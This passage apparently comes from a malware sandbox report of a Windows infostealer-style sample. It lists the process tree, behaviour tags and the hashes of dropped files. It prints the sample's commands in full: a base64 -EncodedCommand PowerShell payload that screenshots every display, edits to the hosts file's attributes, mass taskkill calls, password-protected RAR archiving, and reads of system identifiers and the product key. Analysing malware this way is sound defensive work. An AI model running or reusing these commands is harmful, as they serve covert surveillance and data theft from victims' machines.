bgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5228 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bnneedax\bnneedax.cmdline"5⤵PID:2708
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES150A.tmp" "c:\Users\Admin\AppData\Local\Temp\bnneedax\CSC786181C48D304BC199F668F05E5BEBD2.TMP"6⤵PID:5432
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵
- Suspicious use of WriteProcessMemory
PID:6096 -
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:6112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:4668 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:4944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:5912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:6036
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:6020
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5604
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6112
-
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:6064
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4176
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4960"3⤵PID:5756
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1676
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 49604⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4960"3⤵PID:1848
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 49604⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4628"3⤵PID:5480
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3148
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 46284⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4628"3⤵PID:5724
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 46284⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2460"3⤵PID:5252
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 24604⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2460"3⤵PID:6012
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 24604⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 512"3⤵PID:2124
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 5124⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 512"3⤵PID:5936
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 5124⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2012"3⤵PID:5928
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 20124⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4712"3⤵PID:5560
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6124
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47124⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2012"3⤵PID:5244
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 20124⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1428"3⤵PID:5268
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1848
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 14284⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4712"3⤵PID:4740
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47124⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3192"3⤵PID:6028
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 31924⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1428"3⤵PID:5696
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 14284⤵
- Kills process with taskkill
PID:5640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 936"3⤵PID:5592
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 9364⤵
- Kills process with taskkill
PID:5016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3192"3⤵PID:5596
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5664
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 31924⤵
- Kills process with taskkill
PID:5444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 936"3⤵PID:5720
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 9364⤵
- Kills process with taskkill
PID:5288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2892"3⤵PID:5564
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 28924⤵
- Kills process with taskkill
PID:5792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2892"3⤵PID:3972
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 28924⤵
- Kills process with taskkill
PID:5900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3424"3⤵PID:784
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 34244⤵
- Kills process with taskkill
PID:5924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3424"3⤵PID:6116
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4292
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 34244⤵
- Kills process with taskkill
PID:728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:5804
-
C:\Windows\system32\getmac.exegetmac4⤵PID:1524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI47442\rar.exe a -r -hp"blockiscool" "C:\Users\Admin\AppData\Local\Temp\4Hy52.zip" *"3⤵PID:4624
-
C:\Users\Admin\AppData\Local\Temp\_MEI47442\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI47442\rar.exe a -r -hp"blockiscool" "C:\Users\Admin\AppData\Local\Temp\4Hy52.zip" *4⤵
- Executes dropped EXE
PID:5452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:5548
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:5840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:5836
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2124
-
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:5444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:5636
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:5420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:4548
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:3960
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:2272
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3856
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
116KB
MD5be8dbe2dc77ebe7f88f910c61aec691a
SHA1a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA2564d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA5120da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655
-
Filesize
48KB
MD52152fe099ca3e722a8b723ea26df66c6
SHA11daaaba933501949e5d0e3d3968f4279dcde617d
SHA25641eb95b13a115594ca40eacbb73b27233b7a8f40e9dbfbc597b9f64f0a06b485
SHA5125168f3c554ba8f6c1d923a047ca6784c106b56b8e1944113059190e2a9c19bd8722f14106ea7300ab222696e5164ee66d857b5d619328dd29bbb27943b073cf9
-
Filesize
59KB
MD51b06133298f03ff20e5d31cb3b0bca63
SHA10678e26f8d03e2ea0ba8d78d6d14809914d9c0a8
SHA256e92c373cc790a5411681a78ade2b75ecb03f3cf17aab7d98c0fb3afa2254684d
SHA51218c50a5ff69c0c7e19c27039eda0cade0e8bc8d617cca4bc8981dc8a519fa86a05a86b0662aaa493604e9801edf6a41ee65336332b715188e5e17a60a8154cbc
-
Filesize
105KB
MD5a6102e46e07e1219f90392d1d89ac4d6
SHA1425375d377fde63532aa567978c58a1f131a41b1
SHA256572116a1ecdc809846f22d3ccd432326a7cff84969aa0de5a44e1fbe4c02bcf7
SHA51227bad2fd9b9953798b21602f942228aae6cec23cac1c160a45c4a321f1d0151ce245a82cceb65bfcd7412b212cb19e44fff3b045d7f3bedac49ff92d1c4affa6
-
Filesize
35KB
MD5ee8c405267c3baaa133e2e8d13b28893
SHA1b048112268f8300b3e47e441c346dea35e55d52a
SHA256462b55ca1a405cf11a20798cf38873a328d3720bbd9e46242ce40a5bc82f47d1
SHA512da290e352fa759414bbfa84d1c213be9c5722f5b43ab36ae72ea816e792a04e9aaa5253b935d6acdc34611f0ef17c2c0e8d181d014ce3cb117b5775e406f820a
-
Filesize
86KB
MD5cf374ecc905c5694986c772d7fc15276
SHA1a0ee612388a1c68013f5e954e9280ba0db1bd223
SHA256d94c8b2004a570d0f3b1cfd0333e4b1a82696fe199a1614d9054f8bfef4ba044
SHA5120074b3e365782721de8d0a6ee4aa43871d9498eae07a24443b84b755fa00ec3335e42aedeefed0499e642bde9f4ad08843f36b97e095ef212ec29db022676a42
-
Filesize
26KB
MD5a56e79b7526129f06c4feacf1f8ed117
SHA199f4b0e65c01604f1f5beaff1c0549b1c5a807c5
SHA256dff778a28f75ea484a8e2e91c31235eb8d44128f5ace83491e4fbe923addffad
SHA512b1f1fee24e1041424e5e05e2087440a6b9eb79ab57367d6f83fa83c6a39c7eb693d6edac9a7ac1c22a26109014fb4a12ef31b33775b23e857afeca777ae0bbcb
-
Filesize
44KB
MD5cd2becb9c6dc5cc632509da8cbd0b15d
SHA128a705e779ed0e40651875cb62fa8e07d3e27e10
SHA2562a56f2fdbd69a386924d2c00266f1a57954e09c9eb022280be713d0c6ef805ce
SHA512fb22b719d4db4c50ab11984ba1bef29a2154d3f2a283b9fa407fd5ec079b67bedf188d5bb94b45b3d18e9000dce11ebf8bb3cd35d465ccbe49c54e150d21a62a
-
Filesize
57KB
MD5a045491faa0cba94b3230b254db7f2d2
SHA111a87b7f872e24bab0b278bd88c514b5788975b1
SHA25679769e9318b6e525a145293affedc97b5e7a2e994c88f9df445b887df75f92ee
SHA512a279306e78f34feed13dedd7ecedd226304d5f06746a14c0f9759a7191953de6409b244d23629b25fe9c4a374528ffc6ac92bd1090e218ee5962815491fdcb43
-
Filesize
13KB
MD571405f0ba5d7da5a5f915f33667786de
SHA1bb5cdf9c12fe500251cf98f0970a47b78c2f8b52
SHA2560099f17128d1551a47cbd39ce702d4acc4b49be1bb1cfe974fe5a42da01d88eb
SHA512b2c6438541c4fa7af3f8a9606f64eeef5d77ddbc0689e7501074bb72b7cc907a8461a75089e5b70b881bc3b1be009888ff25ea866faaf1c49dd521027041295a
-
Filesize
12KB
MD5a17d27e01478c17b88794fd0f79782fc
SHA12b8393e7b37fb990be2cdc82803ca49b4cef8546
SHA256ac227773908836d54c8fc06c4b115f3bdfc82e4d63c7f84e1f8e6e70cd066339
SHA512ddc6dda49d588f22c934026f55914b31e53079e044dec7b4f1409668dbfe8885b887cc64a411d44f83bc670ac8a8b6d3ad030d4774ef7bf522f1d3bc00e07485
-
Filesize
12KB
MD5e485c1c5f33ad10eec96e2cdbddff3c7
SHA131f6ba9beca535f2fb7ffb755b7c5c87ac8d226c
SHA256c734022b165b3ba6f8e28670c4190a65c66ec7ecc961811a6bdcd9c7745cac20
SHA512599036d8fa2e916491bedb5bb49b94458a09dddd2908cf770e94bb0059730598ec5a9b0507e6a21209e2dcae4d74027313df87c9ab51fad66b1d07903bae0b35
-
Filesize
12KB
MD50ffb34c0c2cdec47e063c5e0c96b9c3f
SHA19716643f727149b953f64b3e1eb6a9f2013eac9c
SHA256863a07d702717cf818a842af0b4e1dfd6e723f712e49bf8c3af3589434a0ae80
SHA5124311d582856d9c3cac2cdc6a9da2137df913bcf69041015fd272c2780f6ab850895deb69279a076376a2e6401c907cb23a3052960478a6cf4b566a20cce61bd1
-
Filesize
16KB
MD5792c2b83bc4e0272785aa4f5f252ff07
SHA16868b82df48e2315e6235989185c8e13d039a87b
SHA256d26d433f86223b10ccc55837c3e587fa374cd81efc24b6959435a6770addbf24
SHA51272c99cff7fd5a762524e19abee5729dc8857f3ee3c8f78587625ec74f2ad96af7dee03aba54b441cda44b04721706bed70f3ad88453a341cbb51aac9afd9559e
-
Filesize
12KB
MD549e3260ae3f973608f4d4701eb97eb95
SHA1097e7d56c3514a3c7dc17a9c54a8782c6d6c0a27
SHA256476fbad616e20312efc943927ade1a830438a6bebb1dd1f83d2370e5343ea7af
SHA512df22cf16490faa0dc809129ca32eaf1a16ec665f9c5411503ce0153270de038e5d3be1e0e49879a67043a688f6c42bdb5a9a6b3cea43bf533eba087e999be653
-
Filesize
12KB
MD57f14fd0436c066a8b40e66386ceb55d0
SHA1288c020fb12a4d8c65ed22a364b5eb8f4126a958
SHA256c78eab8e057bddd55f998e72d8fdf5b53d9e9c8f67c8b404258e198eb2cdcf24
SHA512d04adc52ee0ceed4131eb1d133bfe9a66cbc0f88900270b596116064480afe6ae6ca42feb0eaed54cb141987f2d7716bb2dae947a025014d05d7aa0b0821dc50
-
Filesize
12KB
MD510f0c22c19d5bee226845cd4380b4791
SHA11e976a8256508452c59310ca5987db3027545f3d
SHA256154ef0bf9b9b9daa08101e090aa9716f0fa25464c4ef5f49bc642619c7c16f0e
SHA5123a5d3dc6448f65e1613e1a92e74f0934dd849433ceca593e7f974310cd96bf6ad6ccc3b0cb96bdb2dcc35514bc142c48cb1fd20fee0d8fa236999ad155fc518b
-
Filesize
13KB
MD5405038fb22cd8f725c2867c9b4345b65
SHA1385f0eb610fce082b56a90f1b10346c37c19d485
SHA2561c1b88d403e2cde510741a840afa445603f76e542391547e6e4cc48958c02076
SHA512b52752ac5d907dc442ec7c318998fd54ad9ad659bde4350493fe5ca95286ecefcbbbf82d718d4bf4e813b4d20a62cd1f7ba11ee7c68c49ec39307b7746968d18
-
Filesize
12KB
MD5aff9165cff0fb1e49c64b9e1eaefdd86
SHA1cdef56ab5734d10a08bc373c843abc144fe782cb
SHA256159ecb50f14e3c247faec480a3e6e0cf498ec13039c988f962280187cee1391d
SHA51264ddf8965defaf5e5ae336d37bdb3868538638bad927e2e76e06ace51a2bca60aefaab18c300bb7e705f470a937ad978edd0338091ad6bcc45564c41071eeb40
-
Filesize
13KB
MD54334f1a7b180998473dc828d9a31e736
SHA14c0c14b5c52ab5cf43a170364c4eb20afc9b5dd4
SHA256820e3acd26ad7a6177e732019492b33342bc9200fc3c0af812ebd41fb4f376cb
